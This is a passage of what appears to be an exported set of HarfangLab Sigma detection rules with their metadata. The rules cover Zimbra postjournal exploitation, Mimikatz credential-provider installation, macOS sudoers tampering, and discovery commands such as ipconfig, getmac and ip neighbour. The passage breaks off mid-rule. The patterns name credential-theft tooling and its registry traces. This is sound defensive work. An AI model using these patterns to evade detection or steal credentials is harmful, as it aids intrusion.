"rule_description": "Detects the suspicious creation of child processes by the postjournal service related to the exploitation of a Zimbra vulnerability.\nThis behavior is related to the exploitation of the \"exchange compatible journaling\" feature on non-patched Zimbra instances.\nThis flaw allows remote unauthenticated attackers to execute arbitrary commands.\nIt is recommended to gather more information about the Zimbra instance and to investigate the command-line.\n",
"rule_creation_date": "2024-10-09",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "db074059-eadd-4530-a103-5dbf7732b80f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094743Z",
"creation_date": "2026-03-23T11:45:34.094745Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094749Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kcredentialprovider.c",
"https://blog.leetsys.com/2012/01/02/capturing-windows-7-credentials-at-logon-using-custom-credential-provider/",
"https://attack.mitre.org/techniques/T1556/002/",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1556_002_credential_provider_mimikatz.yml",
"content": "title: Mimikatz Credential Provider Installed\nid: db074059-eadd-4530-a103-5dbf7732b80f\ndescription: |\n Detects the installation of the Mimikatz credential provider.\n Attackers can install this credential provider in order to obtain user credential.\n It is recommended to isolate infected systems, to look for the unwanted usage of stolen credentials on others hosts (e.g via Path-the-Hash), and to start memory forensics to determine extracted credentials.\nreferences:\n - https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kcredentialprovider.c\n - https://blog.leetsys.com/2012/01/02/capturing-windows-7-credentials-at-logon-using-custom-credential-provider/\n - https://attack.mitre.org/techniques/T1556/002/\n - https://attack.mitre.org/techniques/T1003/\ndate: 2021/06/17\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1556.002\n - attack.t1003\n - classification.Windows.Source.Registry\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_1:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{DC2EB890-F593-4E6D-A085-E8C112CFBEC4}\\(Default)'\n - 'HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{DC2EB890-F593-4E6D-A085-E8C112CFBEC4}\\(Default)'\n selection_2:\n EventType: SetValue\n TargetObject|contains:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\'\n - 'HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\'\n Details: 'mimilib'\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "db074059-eadd-4530-a103-5dbf7732b80f",
"rule_name": "Mimikatz Credential Provider Installed",
"rule_description": "Detects the installation of the Mimikatz credential provider.\nAttackers can install this credential provider in order to obtain user credential.\nIt is recommended to isolate infected systems, to look for the unwanted usage of stolen credentials on others hosts (e.g via Path-the-Hash), and to start memory forensics to determine extracted credentials.\n",
"rule_creation_date": "2021-06-17",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1556.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "db3b6a01-e4b7-4b1e-825c-d14f1b9b73bf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295096Z",
"creation_date": "2026-03-23T11:45:35.295099Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295106Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/",
"https://opensource.apple.com/source/Libc/Libc-583/include/unistd.h.auto.html",
"https://www.manpagez.com/man/3/confstr/",
"https://attack.mitre.org/techniques/T1083/"
],
"name": "t1083_python_confstr_user_temp_dir.yml",
"content": "title: User Temporary Directory Discovered via Python\nid: db3b6a01-e4b7-4b1e-825c-d14f1b9b73bf\ndescription: |\n Detects the discovery of the user temporary directory via the python3 os.confstr function.\n Attackers may use it during the discovery phase of an attack to retrieve the user temporary directory.\n It is recommended to check for other suspicious activity by the process and its parent.\nreferences:\n - https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/\n - https://opensource.apple.com/source/Libc/Libc-583/include/unistd.h.auto.html\n - https://www.manpagez.com/man/3/confstr/\n - https://attack.mitre.org/techniques/T1083/\ndate: 2022/12/08\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Python\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image:\n - '/usr/bin/python'\n - '/usr/bin/python2'\n - '/usr/bin/python3'\n # _CS_DARWIN_USER_TEMP_DIR\n CommandLine|contains|all:\n - '-c'\n - 'os.confstr(65537)'\n ParentImage|contains: '?'\n\n condition: selection\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "db3b6a01-e4b7-4b1e-825c-d14f1b9b73bf",
"rule_name": "User Temporary Directory Discovered via Python",
"rule_description": "Detects the discovery of the user temporary directory via the python3 os.confstr function.\nAttackers may use it during the discovery phase of an attack to retrieve the user temporary directory.\nIt is recommended to check for other suspicious activity by the process and its parent.\n",
"rule_creation_date": "2022-12-08",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1083"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "db6caac2-abb0-419f-9f88-47a708a074d6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628536Z",
"creation_date": "2026-03-23T11:45:34.628538Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628542Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man8/ip-neighbour.8.html",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_ip_neighbour.yml",
"content": "title: Ip Neighbour Execution\nid: db6caac2-abb0-419f-9f88-47a708a074d6\ndescription: |\n Detects the execution of the IP neighbour utility to display the neighbour table (ARP cache).\n Attackers may use it during discovery phase to discover remote systems.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://man7.org/linux/man-pages/man8/ip-neighbour.8.html\n - https://attack.mitre.org/techniques/T1018/\ndate: 2022/12/23\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ip'\n CommandLine|contains: ' n' # neighbour\n ParentImage|contains: '?'\n\n filter_not_neighboor_options:\n CommandLine|contains:\n - ' netns'\n - ' nomaster'\n\n exclusion_not_show:\n CommandLine|contains:\n - ' add'\n - ' change'\n - ' replace'\n - ' delete'\n - ' flush'\n - ' get'\n\n exclusion_insights:\n CommandLine: '/sbin/ip -? neighbor show nud all'\n ParentImage: '/usr/bin/timeout'\n\n exclusion_sosreport:\n - ParentCommandLine|startswith: '/usr/bin/python /usr/sbin/sosreport '\n - GrandparentCommandLine: '/usr/bin/python /usr/sbin/sosreport'\n - GrandparentCommandLine|startswith: '/usr/bin/python /usr/sbin/sosreport '\n\n exclusion_sosreport_2:\n ParentImage: '/usr/bin/timeout'\n GrandparentCommandLine|contains:\n - ' sosreport --tmp-dir '\n - ' /usr/sbin/sosreport'\n - ' /sbin/sosreport'\n - ' /usr/sbin/sos report'\n\n exclusion_gitlab:\n - ParentCommandLine|contains: '/opt/gitlab/embedded/bin/ruby /opt/gitlab/embedded/bin'\n - GrandparentCommandLine: '/bin/bash /opt/gitlab/bin/gitlab-ctl reconfigure'\n - GrandparentImage|startswith: '/opt/gitlab/embedded/bin/'\n\n exclusion_qemu:\n ParentCommandLine: '/usr/bin/perl /var/lib/qemu-server/pve-bridgedown *'\n GrandparentImage: '/usr/bin/qemu-system-x86_64'\n\n exclusion_pihole:\n GrandparentImage: '/usr/bin/pihole-FTL'\n\n exclusion_insights_client:\n CommandLine:\n - '/sbin/ip -4 neighbor show nud all'\n - '/sbin/ip -6 neighbor show nud all'\n ParentCommandLine|startswith:\n - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py '\n - '/usr/bin/python* /usr/lib/python*/site-packages/insights_client/run.py '\n - '/usr/bin/python* /usr/bin/insights-client-run '\n\n exclusion_bettercap:\n ParentCommandLine|startswith: '/tmp/bettercap '\n\n exclusion_modprobe:\n ParentCommandLine:\n - '/bin/sh /usr/local/bin/modprobe nf_tables'\n - '/bin/sh /usr/local/bin/modprobe -va nf_conntrack'\n\n exclusion_libvirt:\n ParentImage:\n - '/usr/bin/libvirtd'\n - '/usr/sbin/libvirtd'\n\n exclusion_wgquick:\n ParentCommandLine: '/bin/bash /usr/bin/wg-quick up new-tooling'\n\n exclusion_containerd:\n Ancestors|contains:\n - '/bin/runc|'\n - '/bin/containerd-shim-runc-v2|'\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n - '|/opt/bmc/bladelogic/RSCD/sbin/bldeploy|'\n - '|/opt/bladelogic/*/NSH/sbin/bldeploy|'\n\n exclusion_chef:\n ParentImage:\n - '/opt/chef/embedded/bin/ruby'\n - '/opt/chefdk/embedded/bin/ruby'\n\n exclusion_facter:\n ParentImage: '/usr/bin/facter'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "db6caac2-abb0-419f-9f88-47a708a074d6",
"rule_name": "Ip Neighbour Execution",
"rule_description": "Detects the execution of the IP neighbour utility to display the neighbour table (ARP cache).\nAttackers may use it during discovery phase to discover remote systems.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "db7909aa-b0a9-4065-9539-4587611d632f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626824Z",
"creation_date": "2026-03-23T11:45:34.626826Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626830Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/CraigHRowland/status/1580658905910108160/photo/1",
"https://attack.mitre.org/techniques/T1548/003/"
],
"name": "t1548_003_sudo_config_modified_macos.yml",
"content": "title: Sudo Configuration Modified (macOS)\nid: db7909aa-b0a9-4065-9539-4587611d632f\ndescription: |\n Detects a suspicious attempt to modify the content of /etc/sudoers or any file within /etc/sudoers.d.\n These files contain the configuration of the 'sudo' utility, used to give temporary privileges to an application.\n Their modification can be an attempt to elevate privileges.\n It is recommended to verify if the process performing the modification has legitimate reason to do so.\nreferences:\n - https://twitter.com/CraigHRowland/status/1580658905910108160/photo/1\n - https://attack.mitre.org/techniques/T1548/003/\ndate: 2024/06/18\nmodified: 2026/02/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.003\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.PrivilegeEscalation\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n - Path:\n - '/private/etc/sudoers'\n - '/private/etc/sudoers.d/*'\n - TargetPath:\n - '/private/etc/sudoers'\n - '/private/etc/sudoers.d/*'\n selection_process:\n ProcessImage|contains: '?'\n\n filter_is_read:\n Kind: 'read'\n\n filter_visudo:\n - Image: '/usr/sbin/visudo'\n - ProcessGrandparentCommandLine|startswith: '/bin/bash /Users/*/.battery-tmp/battery/battery.sh visudo '\n\n exclusion_kandji:\n Image: '/Library/Kandji/Kandji Agent.app/Contents/Helpers/Kandji Parameter Agent.app/Contents/MacOS/kandji-parameter-agent'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessGrandparentCommandLine: '/Library/Application Support/JAMF/tmp/'\n - ProcessParentCommandLine|startswith: /bin/bash /Library/Application Support/JAMF/'\n\n exclusion_beyondco_helper:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'de.beyondco.herd.helper'\n\n exclusion_brew:\n ProcessParentCommandLine:\n - 'sudo tee -a /etc/sudoers.d/brew-nopasswd'\n - 'sudo chmod 440 /etc/sudoers.d/brew-nopasswd'\n\n exclusion_atera:\n ProcessParentImage: '/Applications/AteraAgent.app/Contents/MacOS/AteraAgent'\n\n exclusion_jumpcloud:\n ProcessImage: '/opt/jc/bin/jumpcloud-agent'\n\n exclusion_intunes:\n ProcessAncestors|contains: '/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "db7909aa-b0a9-4065-9539-4587611d632f",
"rule_name": "Sudo Configuration Modified (macOS)",
"rule_description": "Detects a suspicious attempt to modify the content of /etc/sudoers or any file within /etc/sudoers.d.\nThese files contain the configuration of the 'sudo' utility, used to give temporary privileges to an application.\nTheir modification can be an attempt to elevate privileges.\nIt is recommended to verify if the process performing the modification has legitimate reason to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-02-09",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dba28126-8b26-439d-8982-4719d1c57682",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083422Z",
"creation_date": "2026-03-23T11:45:34.083424Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083429Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/getmac",
"https://attack.mitre.org/techniques/T1016/"
],
"name": "t1016_getmac.yml",
"content": "title: Getmac Execution\nid: dba28126-8b26-439d-8982-4719d1c57682\ndescription: |\n Detects the execution of the Getmac.exe binary.\n Getmac returns the media access control (MAC) address and the list of network protocols associated with each address for all network cards in each computer, either locally or across a network.\n Attackers may use it during discovery phase to gather information about the host.\n It is recommended to analyze the context behind the execution of this command with the process tree to determine its legitimacy.\nreferences:\n - https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/getmac\n - https://attack.mitre.org/techniques/T1016/\ndate: 2022/12/02\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\getmac.exe'\n - OriginalFileName: 'getmac.exe'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_grandparentimage:\n GrandparentImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Microsoft Azure Storage Explorer\\StorageExplorer.exe'\n - '*\\AppData\\Local\\Programs\\monsisraapp\\MonSisra2.exe'\n - '*\\AppData\\Local\\monsisraapp\\app-*\\MonSisra2.exe'\n - '*\\AppData\\Local\\Programs\\MonSisra2\\MonSisra2.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n\n exclusion_mofcompiler:\n ParentImage: '?:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe'\n CommandLine: 'getmac'\n\n exclusion_visual_studio:\n ParentImage:\n - '?:\\Windows\\Temp\\\\*\\vs_bootstrapper_d15\\vs_setup_bootstrapper.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\vs_bootstrapper_d15\\vs_setup_bootstrapper.exe'\n - '*\\Common7\\IDE\\devenv.exe'\n - '*\\Common7\\IDE\\Blend.exe'\n - '*\\Common7\\ServiceHub\\Controller\\Microsoft.ServiceHub.Controller.exe'\n - '*\\Common7\\ServiceHub\\Hosts\\ServiceHub.Host.netfx.x86\\ServiceHub.IdentityHost.exe'\n - '*\\Common7\\ServiceHub\\Hosts\\ServiceHub.Host.dotnet.x64\\ServiceHub.VSDetouredHost.exe'\n\n exclusion_jetbrains:\n ParentImage: '?:\\Users\\\\*\\AppData\\Local\\JetBrains\\JetBrains Rider *\\bin\\rider64.exe'\n\n exclusion_jetbrains_signed:\n ProcessParentOriginalFileName:\n - 'rider64.exe'\n - 'idea64.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'JetBrains s.r.o.'\n\n exclusion_dahua:\n - ParentImage: '?:\\DSS\\DSS Server\\jre\\bin\\VMS_CFGS.exe'\n - GrandparentImage:\n - '?:\\DSS\\DSS Server\\SS\\VMS_SS.exe'\n - '?:\\DSS\\DSS Server\\PTS\\VMS_PTS.exe'\n - '?:\\DSS\\DSS Server\\SS\\CQFSTools.exe'\n - '?:\\DSS Express\\Server\\SS\\DSS_SS.exe'\n - '?:\\DSS Express\\Server\\PTS\\DSS_PTS.exe'\n - '?:\\DSS Express\\Server\\SS\\CQFSTools.exe'\n\n exclusion_dahua_signed:\n # \\DSS Server\\PTS\\VMS_PTS.exe\n # \\DSS Server\\SS\\VMS_SS.exe\n # \\DSS Server\\SS\\CQFSTools.exe\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Zhejiang Dahua Technology Co., Ltd.'\n\n exclusion_3dvista:\n ProcessAncestors|contains: '|?:\\Program Files\\3DVista\\3DVista Virtual Tour\\3DVista Virtual Tour.exe|'\n\n exclusion_mailspring:\n ProcessGrandparentOriginalFileName: 'Mailspring.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Foundry376'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dba28126-8b26-439d-8982-4719d1c57682",
"rule_name": "Getmac Execution",
"rule_description": "Detects the execution of the Getmac.exe binary.\nGetmac returns the media access control (MAC) address and the list of network protocols associated with each address for all network cards in each computer, either locally or across a network.\nAttackers may use it during discovery phase to gather information about the host.\nIt is recommended to analyze the context behind the execution of this command with the process tree to determine its legitimacy.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dc40e7d9-a996-45bf-a2ae-f8caf1816852",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591776Z",
"creation_date": "2026-03-23T11:45:34.591779Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591787Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1016/",
"https://attack.mitre.org/software/S0100/"
],
"name": "t1016_ipconfig.yml",
"content": "title: Ipconfig Execution\nid: dc40e7d9-a996-45bf-a2ae-f8caf1816852\ndescription: |\n Detects the execution of ipconfig.exe, a legitimate Windows utility used to gather network interface information.\n Adversaries may execute ipconfig.exe to collect network information for reconnaissance or data exfiltration purposes.\n It is recommended to investigate the source and context of ipconfig.exe execution and correlate this alert with other discovery activities.\nreferences:\n - https://attack.mitre.org/techniques/T1016/\n - https://attack.mitre.org/software/S0100/\ndate: 2021/05/17\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - attack.s0100\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_normal:\n - Image|endswith: '\\ipconfig.exe'\n # Renamed binaries\n - OriginalFileName: 'ipconfig.exe'\n\n selection_parent:\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionnaly for this rule, because it triggers so frequently with a low severity, we will ignore\n # instances of `ipconfig` where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem by requiring the ParentImage fields to contain a `\\`.\n ParentImage|contains: '\\'\n\n exclusion_commandline:\n CommandLine|contains:\n # -release and -release6\n - '-release'\n # /release and /release6\n - '/release'\n - '-renew'\n - '/renew'\n - '-flushdns'\n - '/flushdns'\n - '-displaydns'\n - '/displaydns'\n - '-registerdns'\n - '/registerdns'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_parentimage:\n ParentImage:\n - '?:\\Windows\\System32\\sdiagnhost.exe'\n - '?:\\Windows\\SysWOW64\\sdiagnhost.exe'\n - '?:\\Pritunl\\pritunl-service.exe'\n - '?:\\WindowsAzure\\Packages\\Telemetry\\WindowsAzureTelemetryService.exe'\n - '?:\\WindowsAzure\\Packages\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages_*\\Telemetry\\WindowsAzureTelemetryService.exe'\n - '?:\\WindowsAzure\\Packages_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages_*\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\Packages\\WaAppAgent.exe'\n - '?:\\Windows\\System32\\CompatTelRunner.exe'\n\n exclusion_grandparent:\n GrandparentImage:\n - '*\\Microsoft SQL Server\\MSSQL??.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe'\n - '*\\Microsoft SQL Server\\MSSQL??.VIVA\\MSSQL\\Binn\\sqlservr.exe'\n # C:\\Users\\xxxx\\AppData\\Local\\Temp\\ESETLogCollector64_4212.exe\n - '*\\AppData\\Local\\Temp\\ESETLogCollector??_*.exe'\n - '*\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n\n exclusion_explorer1:\n ParentImage: '?:\\Windows\\explorer.exe'\n GrandparentImage: '?:\\Windows\\System32\\userinit.exe'\n\n exclusion_explorer2:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_explorer3:\n ParentImage:\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n - '?:\\Program Files\\WindowsApps\\Microsoft.PowerShell_*\\pwsh.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage: '?:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_*\\WindowsTerminal.exe'\n\n exclusion_cisco_webex:\n # Cisco Webex\n 